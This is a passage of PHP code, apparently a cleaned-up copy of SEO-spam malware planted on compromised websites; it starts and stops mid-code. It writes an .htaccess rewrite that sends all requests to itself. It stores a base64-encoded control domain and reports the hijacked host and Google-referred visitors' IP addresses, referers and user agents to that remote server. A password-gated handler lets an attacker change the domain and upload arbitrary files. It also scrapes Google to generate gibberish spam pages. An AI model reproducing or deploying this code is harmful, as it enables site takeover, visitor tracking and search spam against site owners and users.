= 400) $result = false; curl_close($ch); return $result; } } else if (function_exists('file_get_contents')) { function curl_retrieve($url) { return file_get_contents($url); } } else die('not work'); $hostname = preg_replace('/^www\./', '', $_SERVER['HTTP_HOST']); @mkdir('.log/'); @chmod('.log/', 0777); @mkdir('.log/' . $hostname); @chmod('.log/' . $hostname, 0777); $logFileName = '.log/' . $hostname . '/xml.cgi'; if (@fopen($logFileName, 'r')) { } else { $fp = fopen('.log/' . $hostname . '/xml.cgi', 'w+'); fwrite($fp, 'bXlkaWFyeXVzYS5uZXQ='); // mydiaryusa.net fclose($fp); } if ($_GET['q'] == 'alcobro') { $logFileName = '.htaccess'; if (file_exists($logFileName)) { $flag = 'disable'; } else { $content = ' RewriteEngine On RewriteCond %{REQUEST_FILENAME} !-f RewriteCond %{REQUEST_FILENAME} !-d RewriteRule ^(.*)$ ' . $_SERVER['SCRIPT_NAME'] . '?q=$1 [L] '; $fp = fopen('.htaccess', 'w+'); fwrite($fp, $content); fclose($fp); $flag = 'enable'; } $domainLoggerHost = base64_decode(file_get_contents('.log/' . $hostname . '/xml.cgi')); $url = 'http://' . $domainLoggerHost . '/other/logdomain.php?q=' . $_SERVER['HTTP_HOST']; $result = curl_retrieve($url); echo $result . $flag; die; } $adminUser = $_POST['name']; if (md5($adminUser) == '42a3f0678d1bbb517272142f5b3df3cd') { if ($_GET['dom100500'] != '') { $fp = fopen('.log/' . $hostname . '/xml.cgi', 'w+'); fwrite($fp, $_GET['dom100500']); fclose($fp); echo '100500ok'; die; } if ($_GET['up100500'] != '') { $filename = basename($_FILES['uploaded']['name']); if (move_uploaded_file($_FILES['uploaded']['tmp_name'], $filename)) { echo 'up100500'; } echo '
'; die; } } if (strpos($_SERVER['HTTP_REFERER'], 'site%') > 0) { } else { if (strpos($_SERVER['HTTP_REFERER'], 'google.') > 0) { $domainLoggerHost = base64_decode(file_get_contents('.log/' . $hostname . '/xml.cgi')); $pageVisited = str_replace('-', ' ', $_GET['q']); $url = 'http://' . $domainLoggerHost . '/out/stat.cgi?parameter=' . rawurlencode(strtolower($hostname . $_SERVER['SCRIPT_NAME'] . ':' . $domainLoggerHost)) . '&ip=' . rawurlencode($_SERVER['REMOTE_ADDR']) . '&ref=' . rawurlencode(strtolower($_SERVER['HTTP_REFERER'])) . '&useragent=' . rawurlencode(strtolower($_SERVER['HTTP_USER_AGENT'])) . '&domain=' . rawurlencode(strtolower($_SERVER['HTTP_HOST'])) . '&visit=1&keyword=' . rawurlencode($pageVisited) . '&sheme=22'; $result = curl_retrieve($url); if (preg_match('|http://|iU', $result)) { echo ''; die; } } } // parameter $_20 isn't used... function generatePage($_20) { $hostname = preg_replace('/^www\./', '', $_SERVER['HTTP_HOST']); $q = isset($_GET['q']) ? str_replace('/', '', urldecode($_GET['q'])) : FALSE; // sic! $googleQuery = str_replace('-', '+', $q); $googleQuery = str_replace('_', '+', $q); $url = 'http://www.google.com/search?hl=en&as_q=' . $googleQuery . '&num=100&as_qdr=all'; $result = curl_retrieve($url); preg_match_all('#
(.*)
#U', $result, $matches); $searchResults = array(); for ($i = 0; $i < count($matches[1]); $i++) { $str = trim($matches[1][$i]); $str = strip_tags($str, ''); $str = str_replace( 'em>', 'b>',$str); $str = str_replace( '...', '. ',$str); $str = str_replace( '&#39;', "'",$str); $str = str_replace( ''', "'",$str); $str = str_replace( '#039;', "'",$str); $str = str_replace( '&quot;', '',$str); $str = str_replace( 'middot;', '',$str); $str = str_replace( 'quot;', '',$str); $str = str_replace( 'amp;', '',$str); $str = str_replace( 'nbsp;', '',$str); $str = str_replace( '—', ' ',$str); $str = strip_tags($str); array_push($searchResults,$str); } for ($i = 0; $i < 50; $i++) { $temp1 .= $searchResults[$i]; } Class WordAggregator { var $wordList = array(); function __construct($inputStr) { $inputStr = strtolower($inputStr); $inputStr = str_replace(array(' ? ', '!') , ' . ', $inputStr); $inputStr = str_replace(array('-', '-', '', '', '', '|', '&', '', '/', ' : ', ";\r\n",'©', '·') , '', $inputStr); $inputStr = str_replace(array(') ', '(', ']', '[', '—', "'", '"', '*', '•', '~', '{', '}') , '', $inputStr); $inputStr = str_replace(' ,', ',', $inputStr); $inputStr = preg_replace('~(\s+\d{1,2}\s+)|(\w*\.\w+)~', ' ', $inputStr); $inputStr = preg_replace('~\s+~', ' ', $inputStr); $sentences = explode('. ', $inputStr); $numSentences = count($sentences); for ($i = 0; $i < $numSentences; ++$i) { $sentences[$i] = explode(' ', $sentences[$i]); $numWords = count($sentences[$i]) - 1; for ($j = 0; $j < $numWords; ++$j) { $word = $sentences[$i][$j]; $this->wordList[$word][] = $sentences[$i][$j+1]; } } $uniqueWords = array_keys($this->wordList); foreach($uniqueWords as $word) { $this->wordList[$word] = array_unique($this->wordList[$word]); } } function reconstruct($numIterations) { $iter = 0; for ($n = 0; $iter < $numIterations; ++$n) { $randomWord = array_rand($this->wordList); $randomNum5_to_12 = mt_rand(5, 12); for ($i = 0; $i < $randomNum5_to_12; ++$i) { $collection[$n][$i] = $randomWord; ++$iter; $word = $this->wordList[$randomWord][mt_rand(0, count($this->wordList[$randomWord]) - 1)]; if ($word == '') $word = array_rand($this->wordList); $randomWord = $word; if ($randomWord == '') break 2; } } foreach($collection as $words) { $len = count($words); if ($len <= 2) continue; if (strlen($words[$len-1]) < 4) unset($words[$len-1 ]); $words[$len - 2] = rtrim($words[$len - 2], ',:;'); $words[$len - 1] = rtrim($words[$len - 1], ',:;'); $resultStr .= ucfirst(implode(' ', $words)) . '. '; } $resultStr = str_replace(' .', '.', $resultStr); return $resultStr; } } $str = $temp1; $wa = new WordAggregator($str); $spamSentence = $wa->reconstruct(1400); $spamSentence = preg_replace('/[^a-zA-Z\., -]+?/', '', $spamSentence); $q = isset($_GET['q']) ? str_replace('/', '', urldecode($_GET['q'])) : FALSE; $q = str_replace('-', ' ', $q); $q = str_replace('_', ' ', $q); $googleQuery = str_replace(' ', '+', $q); if ($_GET['page'] != '1') { $pageStart = '&start=' . ($_GET['page'] - 1) * 21; } $result = curl_retrieve('http://images.google.com/images?q=' . $googleQuery . '&lr=lang_en' . $pageStart); preg_match_all('/href="?\/imgres\?imgurl=([^\&]+)/', $result, $matches); $images = array(); for ($i = 0; $i < count($matches[1]); $i++) { $alignments = array('right', 'left', 'center'); array_push($images, '' . ucwords($googleQuery) . ''); } shuffle($images); if (strstr($_SERVER['REQUEST_URI'], '.php')) $linkBase = 'http://' . $_SERVER['HTTP_HOST'] . $_SERVER['SCRIPT_NAME'] . '?q='; else $linkBase = 'http://' . $_SERVER['HTTP_HOST'] . preg_replace('/[^\/]*?$/', '', $_SERVER['SCRIPT_NAME']); $maxLinks = 30; $htmlFiles = glob('.log/' . $hostname . '/*.html'); array_multisort(array_map('filectime', $htmlFiles) , SORT_DESC, $htmlFiles); $nLink = 1; $htmlLinks = ''; foreach($htmlFiles as $fileName) { if ($nLink > $maxLinks) break; preg_match_all('#^\.log/' . $hostname . "/(.*)\.html$#i", $fileName, $matches); $htmlLinks .= '' . str_replace('_', ' ', str_replace('-', ' ', $matches[1][0])) . ', '; $nLink++; } $result = curl_retrieve('http://clients1.google.com/complete/search?hl=en&ds=i&q=' . str_replace(' ', '%20', $q)); preg_match_all('|\["([^"]+)",|si', $result, $matches, PREG_PATTERN_ORDER); $numSuggestion = 0; array_shift($matches[1]); foreach($matches[1] as $suggestion) { $htmlAnchors.= '' . $suggestion . ', '; if ($numSuggestion++ > 11) break; } $fullUrl = $linkBase . $_GET['q']; $htmlNavigation = '' . ucwords($q) . ' - Page 2 | ' . ucwords($q) . ' - Page 3 | ' . ucwords($q) . ' - Page 4 | ' . ucwords($q) . ' - Page 5 | ' . ucwords($q) . ' - Page 6 | ' . ucwords($q) . ' - Page 7'; $sentences = explode('.', $spamSentence); $mergedWords = array_merge($sentences, $images); shuffle($mergedWords); foreach($mergedWords as $word) { $htmlText .= $word; } $donTxtFile = '.log/' . $hostname . '/don.txt'; if (!file_exists($donTxtFile)) { $result = file_get_contents('http://' . $_SERVER['HTTP_HOST']); $result = preg_replace('//i', '', $result); $numMatches = preg_match_all('/<([a-zA-z]+)>(.*)<\/([a-zA-Z]+)>/imsU', $result, $matches); $longestMatchLength = 0; $longestMatchIndex = 0; for ($i = 0; $i < $numMatches; $i++) { if ((preg_match('/\